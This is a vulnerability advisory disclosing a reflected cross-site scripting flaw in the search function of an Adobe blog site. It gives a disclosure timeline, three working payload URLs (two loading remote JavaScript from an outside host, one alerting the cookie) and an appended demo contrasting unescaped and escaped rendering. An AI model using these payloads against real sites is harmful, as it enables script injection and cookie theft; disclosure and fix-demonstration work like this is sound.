----------------------------------------------------------------------------------------------------
Title       : Adobe Experience Delivers reflected Cross-site Scripting (XSS) vulnerability
Vendor      : Adobe Systems Incorporated (http://www.adobe.com)
Description : experiencedelivers.adobe.com is vulnerable to reflected Cross-site Scripting attacks

Advisory time-line:
----------------------------------------------------------------------------------------------------
- Vendor PSIRT notified : 05-Aug-2012
- Vendor response       : 05-Aug-2012. Ticket created. "Looking into it now".
- Status requests       : 09-Sep-2012, 01-Nov-2012, 08-Nov-2012, 13-Nov-2012, 31-Dec-2012
                          Adobe PSIRT has not responded to any requests after 09-Nov-2012
- Packet Storm advisory : 19-Jan-2013

Test environment
----------------------------------------------------------------------------------------------------
- Latest Firefox browser

Details
----------------------------------------------------------------------------------------------------
Affected functionality: search function

Test #1: Remote Javascript execution: display browser cookie
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2FSCRIPT%3E&blog=search&_charset_=UTF-8

Test #2, Remote Javascript execution: overwrite HTML content - PoC
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Fae00.js%3E%3C%2Fscript%3E&blog=search&_charset_=UTF-8

Test #3, Alert test with image-tag
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&blog=search&_charset_=UTF-8

Note: the Javascript test cases are not malicious.
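
Added example, not part of the original advisory and not Adobe's code: all three test values begin with ">, which is consistent with the query parameter being written unencoded into a double-quoted HTML attribute. That reflection point, the search-box template and the function names below are assumptions; the code decodes the advisory's query values and renders them with and without attribute encoding.

```javascript
// Constructed demo: hypothetical server-side rendering of a search box.
// The query values are the URL-encoded "query" parameters from Tests #1-#3.
const TEST_QUERIES = [
  "%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2FSCRIPT%3E",
  "%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Fae00.js%3E%3C%2Fscript%3E",
  "%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E",
];

// Decode a query value the way a form decoder does ('+' becomes a space).
function decodeQuery(raw) {
  return new URLSearchParams("query=" + raw).get("query");
}

// Encode every character that can end or escape an HTML attribute value.
function escapeAttr(value) {
  return String(value).replace(/[&<>"'`]/g, (c) => "&#" + c.charCodeAt(0) + ";");
}

// Vulnerable pattern (assumed): the value is concatenated into the attribute.
function renderUnsafe(query) {
  return '<input type="text" name="query" value="' + query + '">';
}

// Hardened pattern: the same template with attribute encoding applied.
function renderSafe(query) {
  return '<input type="text" name="query" value="' + escapeAttr(query) + '">';
}

// Crude check for this demo only: the template should yield exactly one tag.
// Any extra tag means the reflected value escaped the attribute.
function breaksOut(html) {
  const tags = html.match(/<[a-zA-Z\/][^>]*>/g) || [];
  return tags.length !== 1;
}

// Run every advisory test value through both renderers.
function evaluate() {
  return TEST_QUERIES.map((raw) => {
    const query = decodeQuery(raw);
    return {
      query,
      unsafeBreaksOut: breaksOut(renderUnsafe(query)),
      safeBreaksOut: breaksOut(renderSafe(query)),
    };
  });
}

console.log(evaluate());
```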

Researcher
----------------------------------------------------------------------------------------------------
Janne Ahlberg
Twitter: https://twitter.com/JanneFI
Blog: http://janne.is
Project site: http://idash.net
----------------------------------------------------------------------------------------------------